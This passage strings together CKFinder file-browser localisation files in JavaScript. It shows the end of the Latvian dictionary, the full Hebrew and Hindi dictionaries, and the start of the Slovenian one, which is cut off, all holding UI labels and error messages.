'Clear Basket', // MISSING BasketRemove : 'Remove from Basket', // MISSING BasketOpenFolder : 'Open Parent Folder', // MISSING BasketTruncateConfirm : 'Do you really want to remove all files from the basket?', // MISSING BasketRemoveConfirm : 'Do you really want to remove the file "%1" from the basket?', // MISSING BasketRemoveConfirmMultiple : 'Do you really want to remove %1 files from the basket?', // MISSING BasketEmpty : 'No files in the basket, drag and drop some.', // MISSING BasketCopyFilesHere : 'Copy Files from Basket', // MISSING BasketMoveFilesHere : 'Move Files from Basket', // MISSING // Global messages OperationCompletedSuccess : 'Operation completed successfully.', // MISSING OperationCompletedErrors : 'Operation completed with errors.', // MISSING FileError : '%s: %e', // MISSING // Move and Copy files MovedFilesNumber : 'Number of files moved: %s.', // MISSING CopiedFilesNumber : 'Number of files copied: %s.', // MISSING MoveFailedList : 'The following files could not be moved:<br />%s', // MISSING CopyFailedList : 'The following files could not be copied:<br />%s', // MISSING // Toolbar Buttons (some used elsewhere) Upload : 'Augšupielādēt', UploadTip : 'Augšupielādēt jaunu failu', Refresh : 'Pārlādēt', Settings : 'Uzstādījumi', Help : 'Palīdzība', HelpTip : 'Palīdzība', // Context Menus Select : 'Izvēlēties', SelectThumbnail : 'Izvēlēties sīkbildi', View : 'Skatīt', Download : 'Lejupielādēt', NewSubFolder : 'Jauna apakšmape', Rename : 'Pārsaukt', Delete : 'Dzēst', DeleteFiles : 'Delete Files', // MISSING CopyDragDrop : 'Copy Here', // MISSING MoveDragDrop : 'Move Here', // MISSING // Dialogs RenameDlgTitle : 'Rename', // MISSING NewNameDlgTitle : 'New Name', // MISSING FileExistsDlgTitle : 'File Already Exists', // MISSING SysErrorDlgTitle : 'System Error', // MISSING FileOverwrite : 'Overwrite', // MISSING FileAutorename : 'Auto-rename', // MISSING ManuallyRename : 'Manually rename', // MISSING // Generic OkBtn : 'Labi', CancelBtn : 'Atcelt', CloseBtn : 'Aizvērt', // Upload Panel UploadTitle : 'Jauna faila augšupielādēšana', UploadSelectLbl : 'Izvēlaties failu, ko augšupielādēt', UploadProgressLbl : '(Augšupielādē, lūdzu uzgaidiet...)', UploadBtn : 'Augšupielādēt izvēlēto failu', UploadBtnCancel : 'Atcelt', UploadNoFileMsg : 'Lūdzu izvēlaties failu no sava datora.', UploadNoFolder : 'Please select a folder before uploading.', // MISSING UploadNoPerms : 'File upload not allowed.', // MISSING UploadUnknError : 'Error sending the file.', // MISSING UploadExtIncorrect : 'File extension not allowed in this folder.', // MISSING // Flash Uploads UploadLabel : 'Files to Upload', // MISSING UploadTotalFiles : 'Total Files:', // MISSING UploadTotalSize : 'Total Size:', // MISSING UploadSend : 'Augšupielādēt', UploadAddFiles : 'Add Files', // MISSING UploadClearFiles : 'Clear Files', // MISSING UploadCancel : 'Cancel Upload', // MISSING UploadRemove : 'Remove', // MISSING UploadRemoveTip : 'Remove !f', // MISSING UploadUploaded : 'Uploaded !n%', // MISSING UploadProcessing : 'Processing...', // MISSING // Settings Panel SetTitle : 'Uzstādījumi', SetView : 'Attēlot:', SetViewThumb : 'Sīkbildes', SetViewList : 'Failu Sarakstu', SetDisplay : 'Rādīt:', SetDisplayName : 'Faila Nosaukumu', SetDisplayDate : 'Datumu', SetDisplaySize : 'Faila Izmēru', SetSort : 'Kārtot:', SetSortName : 'pēc Faila Nosaukuma', SetSortDate : 'pēc Datuma', SetSortSize : 'pēc Izmēra', SetSortExtension : 'by Extension', // MISSING // Status Bar FilesCountEmpty : '<Tukša mape>', FilesCountOne : '1 fails', FilesCountMany : '%1 faili', // Size and Speed Kb : '%1 KB', Mb : '%1 MB', Gb : '%1 GB', SizePerSecond : '%1/s', // Connector Error Messages. ErrorUnknown : 'Nebija iespējams pabeigt pieprasījumu. (Kļūda %1)', Errors : { 10 : 'Nederīga komanda.', 11 : 'Resursa veids netika norādīts pieprasījumā.', 12 : 'Pieprasītais resursa veids nav derīgs.', 102 : 'Nederīgs faila vai mapes nosaukums.', 103 : 'Nav iespējams pabeigt pieprasījumu, autorizācijas aizliegumu dēļ.', 104 : 'Nav iespējams pabeigt pieprasījumu, failu sistēmas atļauju ierobežojumu dēļ.', 105 : 'Neatļauts faila paplašinājums.', 109 : 'Nederīgs pieprasījums.', 110 : 'Nezināma kļūda.', 111 : 'It was not possible to complete the request due to resulting file size.', // MISSING 115 : 'Fails vai mape ar šādu nosaukumu jau pastāv.', 116 : 'Mape nav atrasta. Lūdzu pārlādējiet šo logu un mēģiniet vēlreiz.', 117 : 'Fails nav atrasts. Lūdzu pārlādējiet failu sarakstu un mēģiniet vēlreiz.', 118 : 'Source and target paths are equal.', // MISSING 201 : 'Fails ar šādu nosaukumu jau eksistē. Augšupielādētais fails tika pārsaukts par "%1".', 202 : 'Nederīgs fails.', 203 : 'Nederīgs fails. Faila izmērs pārsniedz pieļaujamo.', 204 : 'Augšupielādētais fails ir bojāts.', 205 : 'Neviena pagaidu mape nav pieejama priekš augšupielādēšanas uz servera.', 206 : 'Augšupielāde atcelta drošības apsvērumu dēļ. Fails satur HTML veida datus.', 207 : 'Augšupielādētais fails tika pārsaukts par "%1".', 300 : 'Moving file(s) failed.', // MISSING 301 : 'Copying file(s) failed.', // MISSING 500 : 'Failu pārlūks ir atslēgts drošības apsvērumu dēļ. Lūdzu sazinieties ar šīs sistēmas tehnisko administratoru vai pārbaudiet CKFinder konfigurācijas failu.', 501 : 'Sīkbilžu atbalsts ir atslēgts.' }, // Other Error Messages. ErrorMsg : { FileEmpty : 'Faila nosaukumā nevar būt tukšums.', FileExists : 'File %s already exists.', // MISSING FolderEmpty : 'Mapes nosaukumā nevar būt tukšums.', FolderExists : 'Folder %s already exists.', // MISSING FolderNameExists : 'Folder already exists.', // MISSING FileInvChar : 'Faila nosaukums nedrīkst saturēt nevienu no sekojošajām zīmēm: \n\\ / : * ? " < > |', FolderInvChar : 'Mapes nosaukums nedrīkst saturēt nevienu no sekojošajām zīmēm: \n\\ / : * ? " < > |', PopupBlockView : 'Nav iespējams failu atvērt jaunā logā. Lūdzu veiciet izmaiņas uzstādījumos savai interneta pārlūkprogrammai un izslēdziet visus uznirstošo logu bloķētājus šai adresei.', XmlError : 'It was not possible to properly load the XML response from the web server.', // MISSING XmlEmpty : 'It was not possible to load the XML response from the web server. The server returned an empty response.', // MISSING XmlRawResponse : 'Raw response from the server: %s' // MISSING }, // Imageresize plugin Imageresize : { dialogTitle : 'Resize %s', // MISSING sizeTooBig : 'Cannot set image height or width to a value bigger than the original size (%size).', // MISSING resizeSuccess : 'Image resized successfully.', // MISSING thumbnailNew : 'Create a new thumbnail', // MISSING thumbnailSmall : 'Small (%s)', // MISSING thumbnailMedium : 'Medium (%s)', // MISSING thumbnailLarge : 'Large (%s)', // MISSING newSize : 'Set a new size', // MISSING width : 'Platums', height : 'Augstums', invalidHeight : 'Invalid height.', // MISSING invalidWidth : 'Invalid width.', // MISSING invalidName : 'Invalid file name.', // MISSING newImage : 'Create a new image', // MISSING noExtensionChange : 'File extension cannot be changed.', // MISSING imageSmall : 'Source image is too small.', // MISSING contextMenuName : 'Resize', // MISSING lockRatio : 'Nemainīga Augstuma/Platuma attiecība', resetSize : 'Atjaunot sākotnējo izmēru' }, // Fileeditor plugin Fileeditor : { save : 'Saglabāt', fileOpenError : 'Unable to open file.', // MISSING fileSaveSuccess : 'File saved successfully.', // MISSING contextMenuName : 'Edit', // MISSING loadingFile : 'Loading file, please wait...' // MISSING }, Maximize : { maximize : 'Maximize', // MISSING minimize : 'Minimize' // MISSING }, Gallery : { current : 'Image {current} of {total}' // MISSING }, Zip : { extractHereLabel : 'Extract here', // MISSING extractToLabel : 'Extract to...', // MISSING downloadZipLabel : 'Download as zip', // MISSING compressZipLabel : 'Compress to zip', // MISSING removeAndExtract : 'Remove existing and extract', // MISSING extractAndOverwrite : 'Extract overwriting existing files', // MISSING extractSuccess : 'File extracted successfully.' // MISSING } };
JavaScript
/* * CKFinder * ======== * http://cksource.com/ckfinder * Copyright (C) 2007-2013, CKSource - Frederico Knabben. All rights reserved. * * The software, this file, and its contents are subject to the CKFinder * License. Please read the license.txt file before using, installing, copying, * modifying, or distributing this file or part of its contents. The contents of * this file is part of the Source Code of CKFinder. * */ /** * @fileOverview Defines the {@link CKFinder.lang} object for the Hebrew * language. */ /** * Contains the dictionary of language entries. * @namespace */ CKFinder.lang['he'] = { appTitle : 'CKFinder', // Common messages and labels. common : { // Put the voice-only part of the label in the span. unavailable : '%1<span class="cke_accessibility">, לא זמין</span>', confirmCancel : 'חלק מהאפשרויות שונו. האם לסגור את החלון?', ok : 'אישור', cancel : 'ביטול', confirmationTitle : 'אישור', messageTitle : 'הודעה', inputTitle : 'שאלה', undo : 'לבטל', redo : 'לעשות שוב', skip : 'דלג', skipAll : 'דלג הכל', makeDecision : 'איזו פעולה לבצע?', rememberDecision: 'זכור החלטתי' }, // Language direction, 'ltr' or 'rtl'. dir : 'rtl', HelpLang : 'en', LangCode : 'he', // Date Format // d : Day // dd : Day (padding zero) // m : Month // mm : Month (padding zero) // yy : Year (two digits) // yyyy : Year (four digits) // h : Hour (12 hour clock) // hh : Hour (12 hour clock, padding zero) // H : Hour (24 hour clock) // HH : Hour (24 hour clock, padding zero) // M : Minute // MM : Minute (padding zero) // a : Firt char of AM/PM // aa : AM/PM DateTime : 'd/m/yyyy HH:MM', DateAmPm : ['AM', 'PM'], // Folders FoldersTitle : 'תיקיות', FolderLoading : 'טוען...', FolderNew : 'יש להקליד שם חדש לתיקיה: ', FolderRename : 'יש להקליד שם חדש לתיקיה: ', FolderDelete : 'האם למחוק את התיקיה "%1" ?', FolderRenaming : ' (משנה שם...)', FolderDeleting : ' (מוחק...)', DestinationFolder : 'תיקיית יעד', // Files FileRename : 'יש להקליד שם חדש לקובץ: ', FileRenameExt : 'האם לשנות את הסיומת של הקובץ?', FileRenaming : 'משנה שם...', FileDelete : 'האם למחוק את הקובץ "%1"?', FilesDelete : 'האם למחוק %1 קבצים?', FilesLoading : 'טוען...', FilesEmpty : 'תיקיה ריקה', DestinationFile : 'קובץ יעד', SkippedFiles : 'רשימת קבצים שדולגו:', // Basket BasketFolder : 'סל קבצים', BasketClear : 'ניקוי סל הקבצים', BasketRemove : 'מחיקה מסל הקבצים', BasketOpenFolder : 'פתיחת תיקיית אב', BasketTruncateConfirm : 'האם למחוק את כל הקבצים מסל הקבצים?', BasketRemoveConfirm : 'האם למחוק את הקובץ "%1" מסל הקבצים?', BasketRemoveConfirmMultiple : 'האם למחוק %1 קבצים מסל הקבצים?', BasketEmpty : 'אין קבצים בסל הקבצים, יש לגרור לכאן קובץ.', BasketCopyFilesHere : 'העתקת קבצים מסל הקבצים', BasketMoveFilesHere : 'הזזת קבצים מסל הקבצים', // Global messages OperationCompletedSuccess : 'הפעולה הושלמה בהצלחה.', OperationCompletedErrors : 'הפעולה הושלמה עם שגיאות.', FileError : '%s: %e', // Move and Copy files MovedFilesNumber : 'מספר קבצים שהוזזו: %s.', CopiedFilesNumber : 'מספר קבצים שהועתקו: %s.', MoveFailedList : 'המערכת לא הצליחה להזיז את הקבצים הבאים:<br />%s', CopyFailedList : 'המערכת לא הצליחה להעתיק את הקבצים הבאים:<br />%s', // Toolbar Buttons (some used elsewhere) Upload : 'העלאה', UploadTip : 'העלאת קובץ חדש', Refresh : 'ריענון', Settings : 'הגדרות', Help : 'עזרה', HelpTip : 'עזרה', // Context Menus Select : 'בחירה', SelectThumbnail : 'בחירת תמונה מוקטנת', View : 'צפיה', Download : 'הורדה', NewSubFolder : 'תת-תיקיה חדשה', Rename : 'שינוי שם', Delete : 'מחיקה', DeleteFiles : 'מחיקת קבצים', CopyDragDrop : 'העתקת קבצים לכאן', MoveDragDrop : 'הזזת קבצים לכאן', // Dialogs RenameDlgTitle : 'שינוי שם', NewNameDlgTitle : 'שם חדש', FileExistsDlgTitle : 'קובץ זה כבר קיים', SysErrorDlgTitle : 'שגיאת מערכת', FileOverwrite : 'החלפה', FileAutorename : 'שינוי שם אוטומטי', ManuallyRename : 'שינוי שם ידני', // Generic OkBtn : 'אישור', CancelBtn : 'ביטול', CloseBtn : 'סגור', // Upload Panel UploadTitle : 'העלאת קובץ חדש', UploadSelectLbl : 'בחירת קובץ להעלאה', UploadProgressLbl : '(העלאה מתבצעת, נא להמתין...)', UploadBtn : 'העלאת קובץ', UploadBtnCancel : 'ביטול', UploadNoFileMsg : 'יש לבחור קובץ מהמחשב', UploadNoFolder : 'יש לבחור תיקיה לפני ההעלאה.', UploadNoPerms : 'העלאת קובץ אסורה.', UploadUnknError : 'שגיאה בשליחת הקובץ.', UploadExtIncorrect : 'סוג קובץ זה לא מאושר בתיקיה זאת.', // Flash Uploads UploadLabel : 'קבצים להעלאה', UploadTotalFiles : 'כמות קבצים:', UploadTotalSize : 'גודל סופי:', UploadSend : 'התחלת העלאה', UploadAddFiles : 'הוספת קבצים', UploadClearFiles : 'ניקוי קבצים', UploadCancel : 'ביטול העלאה', UploadRemove : 'מחיקה מהרשימה', UploadRemoveTip : 'מחיקת הקובץ !f', UploadUploaded : '!n% הועלו', UploadProcessing : 'מעבד...', // Settings Panel SetTitle : 'הגדרות', SetView : 'צפיה:', SetViewThumb : 'תמונות מוקטנות', SetViewList : 'רשימה', SetDisplay : 'תצוגה:', SetDisplayName : 'שם קובץ', SetDisplayDate : 'תאריך', SetDisplaySize : 'גודל קובץ', SetSort : 'מיון:', SetSortName : 'לפי שם', SetSortDate : 'לפי תאריך', SetSortSize : 'לפי גודל', SetSortExtension : 'לפי סיומת (Extension)', // Status Bar FilesCountEmpty : '<תיקיה ריקה>', FilesCountOne : 'קובץ 1', FilesCountMany : '%1 קבצים', // Size and Speed Kb : '%1KB', Mb : '%1MB', Gb : '%1GB', SizePerSecond : '%1/s', // Connector Error Messages. ErrorUnknown : 'לא היה ניתן להשלים את הבקשה. (שגיאה %1)', Errors : { 10 : 'הוראה לא תקינה.', 11 : 'סוג המשאב לא צויין בבקשה לשרת.', 12 : 'סוג המשאב המצויין לא תקין.', 102 : 'שם הקובץ או התיקיה לא תקין.', 103 : 'לא היה ניתן להשלים את הבקשה בשל הרשאות מוגבלות.', 104 : 'לא היה ניתן להשלים את הבקשה בשל הרשאות מערכת קבצים מוגבלות.', 105 : 'סיומת הקובץ לא תקינה.', 109 : 'בקשה לא תקינה.', 110 : 'שגיאה לא ידועה.', 111 : 'לא ניתן היה להשלים את הבקשה בשל הגודל החריג של הקובץ הנוצר.', 115 : 'כבר קיים/ת קובץ או תיקיה באותו השם.', 116 : 'התיקיה לא נמצאה. נא לרענן ולנסות שוב.', 117 : 'הקובץ לא נמצא. נא לרענן ולנסות שוב.', 118 : 'כתובות המקור והיעד זהות.', 201 : 'קובץ עם אותו השם כבר קיים. שם הקובץ שהועלה שונה ל "%1"', 202 : 'הקובץ לא תקין.', 203 : 'הקובץ לא תקין. גודל הקובץ גדול מדי.', 204 : 'הקובץ המועלה לא תקין', 205 : 'לא קיימת בשרת תיקיה זמנית להעלאת קבצים.', 206 : 'ההעלאה בוטלה מסיבות אבטחה. הקובץ מכיל תוכן שדומה ל-HTML.', 207 : 'שם הקובץ שהועלה שונה ל "%1"', 300 : 'העברת הקבצים נכשלה.', 301 : 'העתקת הקבצים נכשלה.', 500 : 'דפדפן הקבצים מנוטרל מסיבות אבטחה. יש לפנות למנהל המערכת ולבדוק את קובץ התצורה של CKFinder.', 501 : 'התמיכה בתמונות מוקטנות מבוטלת.' }, // Other Error Messages. ErrorMsg : { FileEmpty : 'שם הקובץ לא יכול להיות ריק', FileExists : 'הקובץ %s כבר קיים', FolderEmpty : 'שם התיקיה לא יכול להיות ריק', FolderExists : 'התיקיה %s כבר קיימת.', FolderNameExists : 'התיקיה כבר קיימת.', FileInvChar : 'שם הקובץ לא יכול לכלול תווים הבאים: \n\\ / : * ? " < > |', FolderInvChar : 'שם התיקיה לא יכול לכלול תווים הבאים: \n\\ / : * ? " < > |', PopupBlockView : 'לא היה ניתן לפתוח קובץ בחלון חדש. נא לבדוק את הגדרות הדפדפן ולבטל את חוסמי החלונות הקובצים.', XmlError : 'לא היה ניתן לטעון מהשרת כהלכה את קובץ ה-XML.', XmlEmpty : 'לא היה ניתן לטעון מהשרת את קובץ ה-XML. השרת החזיר תגובה ריקה.', XmlRawResponse : 'תגובה גולמית מהשרת: %s' }, // Imageresize plugin Imageresize : { dialogTitle : 'שינוי גודל התמונה %s', sizeTooBig : 'גובה ורוחב התמונה לא יכולים להיות גדולים מהגודל המקורי שלה (%size).', resizeSuccess : 'גודל התמונה שונה שהצלחה.', thumbnailNew : 'יצירת תמונה מוקטנת (Thumbnail)', thumbnailSmall : 'קטנה (%s)', thumbnailMedium : 'בינונית (%s)', thumbnailLarge : 'גדולה (%s)', newSize : 'קביעת גודל חדש', width : 'רוחב', height : 'גובה', invalidHeight : 'גובה לא חוקי.', invalidWidth : 'רוחב לא חוקי.', invalidName : 'שם הקובץ לא חוקי.', newImage : 'יצירת תמונה חדשה', noExtensionChange : 'לא ניתן לשנות את סוג הקובץ.', imageSmall : 'התמונה המקורית קטנה מדי', contextMenuName : 'שינוי גודל', lockRatio : 'נעילת היחס', resetSize : 'איפוס הגודל' }, // Fileeditor plugin Fileeditor : { save : 'שמירה', fileOpenError : 'לא היה ניתן לפתוח את הקובץ.', fileSaveSuccess : 'הקובץ נשמר בהצלחה.', contextMenuName : 'עריכה', loadingFile : 'טוען קובץ, נא להמתין...' }, Maximize : { maximize : 'הגדלה למקסימום', minimize : 'הקטנה למינימום' }, Gallery : { current : 'תמונה {current} מתוך {total}' }, Zip : { extractHereLabel : 'חילוץ לפה', extractToLabel : 'חילוץ ל...', downloadZipLabel : 'הורדה כקובץ ZIP', compressZipLabel : 'דחיסה לקובץ ZIP', removeAndExtract : 'מחיקת הקובץ וחילוצו', extractAndOverwrite : 'חילוץ והחלפת קבצים קיימים', extractSuccess : 'הקבצים חולצו בהצלחה.' } };
JavaScript
/* * CKFinder * ======== * http://cksource.com/ckfinder * Copyright (C) 2007-2013, CKSource - Frederico Knabben. All rights reserved. * * The software, this file, and its contents are subject to the CKFinder * License. Please read the license.txt file before using, installing, copying, * modifying, or distributing this file or part of its contents. The contents of * this file is part of the Source Code of CKFinder. * */ /** * @fileOverview Defines the {@link CKFinder.lang} object for the Hindi * language. */ /** * Contains the dictionary of language entries. * @namespace */ CKFinder.lang['hi'] = { appTitle : 'CKFinder', // Common messages and labels. common : { // Put the voice-only part of the label in the span. unavailable : '%1<span class="cke_accessibility">, नही है</span>', confirmCancel : 'काफी विकल्प बदले हुवे है. क्या आपको दाएलोग विंडो बंद करना है?', ok : 'ओके', cancel : 'खारिज', confirmationTitle : 'क्नफ्र्म्रेसं', messageTitle : 'माहिती', inputTitle : 'प्रश्न', undo : 'उन्डू', redo : 'रीडू', skip : 'स्किप', skipAll : 'स्किप ओल', makeDecision : 'क्या करना चाहिये?', rememberDecision: 'मेरा विकल्प याद रखो' }, // Language direction, 'ltr' or 'rtl'. dir : 'ltr', HelpLang : 'en', LangCode : 'hi', // Date Format // d : Day // dd : Day (padding zero) // m : Month // mm : Month (padding zero) // yy : Year (two digits) // yyyy : Year (four digits) // h : Hour (12 hour clock) // hh : Hour (12 hour clock, padding zero) // H : Hour (24 hour clock) // HH : Hour (24 hour clock, padding zero) // M : Minute // MM : Minute (padding zero) // a : Firt char of AM/PM // aa : AM/PM DateTime : 'm/d/yyyy h:MM aa', DateAmPm : ['AM', 'PM'], // Folders FoldersTitle : 'फ़ोल्डर्स', FolderLoading : 'लोडिग...', FolderNew : 'फोल्डरका नया नाम टाईप करो: ', FolderRename : 'फोल्डरका नया नाम टाईप करो: ', FolderDelete : 'क्या आपको "%1" फोल्डर डीलिट करना है?', FolderRenaming : ' (नया नाम...)', FolderDeleting : ' (डिलिट...)', DestinationFolder : 'Destination Folder', // MISSING // Files FileRename : 'फाएलका नया नाम टाईप करो: ', FileRenameExt : 'क्या आपको फाएल एक्सटेंसन बदलना है? फाएल का उपयोग नही कर सकोगे.', FileRenaming : 'नया नाम...', FileDelete : 'क्या आपको फाएल डिलिट करना है "%1"?', FilesDelete : 'Are you sure you want to delete %1 files?', // MISSING FilesLoading : 'लोडिग...', FilesEmpty : 'ये फोल्डर खाली है.', DestinationFile : 'Destination File', // MISSING SkippedFiles : 'List of skipped files:', // MISSING // Basket BasketFolder : 'बास्केट', BasketClear : 'बास्केट खाली करो', BasketRemove : 'बास्केटमें से रीमूव करो', BasketOpenFolder : 'पेरंट फोल्डर को खोलो', BasketTruncateConfirm : 'क्या आपको बास्केट में से सब फाएल खाली करना हे?', BasketRemoveConfirm : 'क्या आपको फाएल "%1" बास्केट में से डिलिट करना है?', BasketRemoveConfirmMultiple : 'Do you really want to remove %1 files from the basket?', // MISSING BasketEmpty : 'बास्केट में कोइ फाएल नहीं है, नई ड्रेग और ड्रॉप करो.', BasketCopyFilesHere : 'बास्केट में से फाएल कोपी करो', BasketMoveFilesHere : 'बास्केट में से फाएल मूव करो', // Global messages OperationCompletedSuccess : 'Operation completed successfully.', // MISSING OperationCompletedErrors : 'Operation completed with errors.', // MISSING FileError : '%s: %e', // MISSING // Move and Copy files MovedFilesNumber : 'Number of files moved: %s.', // MISSING CopiedFilesNumber : 'Number of files copied: %s.', // MISSING MoveFailedList : 'The following files could not be moved:<br />%s', // MISSING CopyFailedList : 'The following files could not be copied:<br />%s', // MISSING // Toolbar Buttons (some used elsewhere) Upload : 'अपलोड', UploadTip : 'अपलोड नई फाएल', Refresh : 'रिफ्रेश', Settings : 'सेटिंग्स', Help : 'मदद', HelpTip : 'मदद', // Context Menus Select : 'सिलेक्ट', SelectThumbnail : 'सिलेक्ट थम्बनेल', View : 'व्यू', Download : 'डाउनलोड', NewSubFolder : 'नया सबफोल्डर', Rename : 'रिनेम', Delete : 'डिलिट', DeleteFiles : 'Delete Files', // MISSING CopyDragDrop : 'यहाँ कोपी करें', MoveDragDrop : 'यंहा मूव करें', // Dialogs RenameDlgTitle : 'रीनेम', NewNameDlgTitle : 'नया नाम', FileExistsDlgTitle : 'फाएल मौजूद हैं', SysErrorDlgTitle : 'सिस्टम एरर', FileOverwrite : 'ओवरराईट', FileAutorename : 'ऑटो-रीनेम', ManuallyRename : 'Manually rename', // MISSING // Generic OkBtn : 'ओके', CancelBtn : 'केंसल', CloseBtn : 'क्लोस', // Upload Panel UploadTitle : 'नया फाएल उपलोड करो', UploadSelectLbl : 'उपलोड करने के लिये फाएल चुनो', UploadProgressLbl : '(उपलोड जारी है, राह देखिय...)', UploadBtn : 'उपलोडके लिये फाएल चुनो', UploadBtnCancel : 'केन्सल', UploadNoFileMsg : 'आपके कोम्पुटर से फाएल चुनो.', UploadNoFolder : 'फोल्डर चुनके अपलोडिग करिये.', UploadNoPerms : 'फाएल उपलोड नही कर सकते.', UploadUnknError : 'फाएल भेजने में मुश्केली हो रही है.', UploadExtIncorrect : 'ये फोल्डरमें ये फाइल एक्सटेंसन अलाव नही है.', // Flash Uploads UploadLabel : 'अपलोड के लिये फाएल्स', UploadTotalFiles : 'कुल फाएल्स:', UploadTotalSize : 'कुल साएज:', UploadSend : 'अपलोड', UploadAddFiles : 'फाएल एड करें', UploadClearFiles : 'फाइल क्लेयर करें', UploadCancel : 'अपलोड केन्सल करें', UploadRemove : 'रीमूव', UploadRemoveTip : 'रीमुव !f', UploadUploaded : 'अपलोड हो गई !n%', UploadProcessing : 'अपलोड जारी हैं...', // Settings Panel SetTitle : 'सेटिंग्स', SetView : 'व्यू:', SetViewThumb : 'थुम्बनेल्स', SetViewList : 'लिस्ट', SetDisplay : 'डिस्प्ले:', SetDisplayName : 'फाएलका नाम', SetDisplayDate : 'तारीख', SetDisplaySize : 'फाएल साईज', SetSort : 'सोर्टिंग:', SetSortName : 'फाएलनाम से', SetSortDate : 'तारिख से', SetSortSize : 'साईज से', SetSortExtension : 'एक्सटेंसन से', // Status Bar FilesCountEmpty : '<फोल्डर खाली>', FilesCountOne : '1 फाएल', FilesCountMany : '%1 फाएल', // Size and Speed Kb : '%1 KB', Mb : '%1 MB', Gb : '%1 GB', SizePerSecond : '%1/s', // Connector Error Messages. ErrorUnknown : 'आपकी रिक्वेस्ट क्मप्लित नही कर सकते. (एरर %1)', Errors : { 10 : 'इन्वेलीड कमांड.', 11 : 'यह रिसोर्स टाईप उपलब्ध नहीं है.', 12 : 'यह रिसोर्स टाईप वेलिड नही हैं.', 102 : 'फाएल या फोल्डर का नाम वेलिड नहीं है.', 103 : 'ओथोरिसेसंन रिस्त्रिक्सं की वजह से, आपकी रिक्वेस्ट पूरी नही कर सकते.', 104 : 'सिस्टम परमिशन रिस्त्रिक्सं की वजह से, आपकी रिक्वेस्ट पूरी नही कर सकते..', 105 : 'फाएल एक्स्त्न्सं गलत है.', 109 : 'इन्वेलीड रिक्वेस्ट.', 110 : 'अननोन एरर.', 111 : 'It was not possible to complete the request due to resulting file size.', // MISSING 115 : 'सेम नाम का फाएल या फोल्डर मोजूद है.', 116 : 'फोल्डर नही मिला. रिफ्रेस करके वापिस प्रयत्न करे.', 117 : 'फाएल नही मिला. फाएल लिस्टको रिफ्रेस करके वापिस प्रयत्न करे.', 118 : 'सोर्स और टारगेट के पाथ एक जैसे है.', 201 : 'वहि नाम की फाएल मोजोद है. अपलोड फाएल का नया नाम "%1".', 202 : 'इन्वेलीड फाएल.', 203 : 'इन्वेलीड फाएल. फाएल बहुत बड़ी है.', 204 : 'अपलोडकी गयी फाएल करप्ट हो गयी है.', 205 : 'फाएल अपलोड करनेके लिये, सर्वरपे टेम्पररी फोल्डर उपलब्थ नही है..', 206 : 'सिक्योरिटी कारण वष, फाएल अपलोड केन्सल किया है. फाएलमें HTML-जैसे डेटा है.', 207 : 'अपलोडेड फाएल का नया नाम "%1".', 300 : 'फाएल मूव नहीं कर सके.', 301 : 'फाएल कोपी नहीं कर सके.', 500 : 'सिक्योरिटी कारण वष, फाएल ब्राउजर डिसेबल किया गया है. आपके सिस्टम एडमिनिस्ट्रेटर का सम्पर्क करे और CKFinder कोंफिग्युरेसन फाएल तपासे.', 501 : 'थम्बनेल सपोर्ट डिसेबल किया है.' }, // Other Error Messages. ErrorMsg : { FileEmpty : 'फाएलका नाम खाली नही हो सकता.', FileExists : 'फाएल %s मोजूद है.', FolderEmpty : 'फोल्डरका नाम खाली नही हो सकता.', FolderExists : 'Folder %s already exists.', // MISSING FolderNameExists : 'Folder already exists.', // MISSING FileInvChar : 'फाएलके नाममें यह केरेक्टर नही हो सकते: \n\\ / : * ? " < > |', FolderInvChar : 'फोल्डरके नाममें यह केरेक्टर नही हो सकते: \n\\ / : * ? " < > |', PopupBlockView : 'यह फाएलको नई विंडोमें नही खोल सकते. आपके ब्राउसरको कोफिग करके सब पोप-अप ब्लोक्र्रको बंध करे.', XmlError : 'वेब सर्वरसे XML रिस्पोंस नही लोड कर सके.', XmlEmpty : 'वेब सर्वरसे XML रिस्पोंस नही लोड कर सके. सर्वरने खाली रिस्पोंस भेजा.', XmlRawResponse : 'सर्वरका रो रिस्पोंस: %s' }, // Imageresize plugin Imageresize : { dialogTitle : 'रिसाइज़ %s', sizeTooBig : 'इमेजकी ओरिजिनल साएजसे बड़ा या छोटा नही कर सके (%size).', resizeSuccess : 'इमेजको रीसाईज की गई है.', thumbnailNew : 'नया थम्बनेल बनाये', thumbnailSmall : 'छोटा (%s)', thumbnailMedium : 'मध्यम (%s)', thumbnailLarge : 'बड़ा (%s)', newSize : 'नई साईज पसंद करे', width : 'चोदाई', height : 'ऊंचाई', invalidHeight : 'इन्वेलीड ऊँचाई.', invalidWidth : 'इन्वेलीड चोड़ाई.', invalidName : 'इन्वेलीड फाएलका नाम.', newImage : 'नई इमेज बनाये', noExtensionChange : 'फाएल एकस्टेनसन नही बदल सकते.', imageSmall : 'सोर्स इमेज बहुत छोटा है.', contextMenuName : 'रीसाईज', lockRatio : 'लोक रेटिओ', resetSize : 'रीसेट साईज' }, // Fileeditor plugin Fileeditor : { save : 'सेव', fileOpenError : 'फाएल नहीं खोल सके.', fileSaveSuccess : 'फाएल सेव हो गई है.', contextMenuName : 'एडिट', loadingFile : 'लोडिग फाएल, राह देखे...' }, Maximize : { maximize : 'मैक्सीमईज', minimize : 'मिनीमाईज' }, Gallery : { current : 'इमेज {current} कुल्मिलाके {total}' }, Zip : { extractHereLabel : 'Extract here', // MISSING extractToLabel : 'Extract to...', // MISSING downloadZipLabel : 'Download as zip', // MISSING compressZipLabel : 'Compress to zip', // MISSING removeAndExtract : 'Remove existing and extract', // MISSING extractAndOverwrite : 'Extract overwriting existing files', // MISSING extractSuccess : 'File extracted successfully.' // MISSING } };
JavaScript
/* * CKFinder * ======== * http://cksource.com/ckfinder * Copyright (C) 2007-2013, CKSource - Frederico Knabben. All rights reserved. * * The software, this file, and its contents are subject to the CKFinder * License. Please read the license.txt file before using, installing, copying, * modifying, or distributing this file or part of its contents. The contents of * this file is part of the Source Code of CKFinder. * */ /** * @fileOverview Defines the {@link CKFinder.lang} object for the Slovenian * language. */ /** * Contains the dictionary of language entries. * @namespace */ CKFinder.lang['sl'] = { appTitle : 'CKFinder', // Common messages and labels. common : { // Put the voice-only part of the label in the span. unavailable : '%1<span class="cke_accessibility">, nedostopen</span>', confirmCancel : 'Nekatere opcije so bile spremenjene. Ali res želite zapreti pogovorno okno?', ok : 'Potrdi', cancel : 'Prekliči', confirmationTitle : 'Potrditev', messageTitle : 'Informacija', inputTitle : 'Vprašanje', undo : 'Razveljavi', redo : 'Obnovi', skip : 'Preskoči', skipAll : 'Preskoči vse', makeDecision : 'Katera aktivnost naj se izvede?', rememberDecision: 'Zapomni si mojo izbiro' }, // Language direction, 'ltr' or 'rtl'. dir : 'ltr', HelpLang : 'en', LangCode : 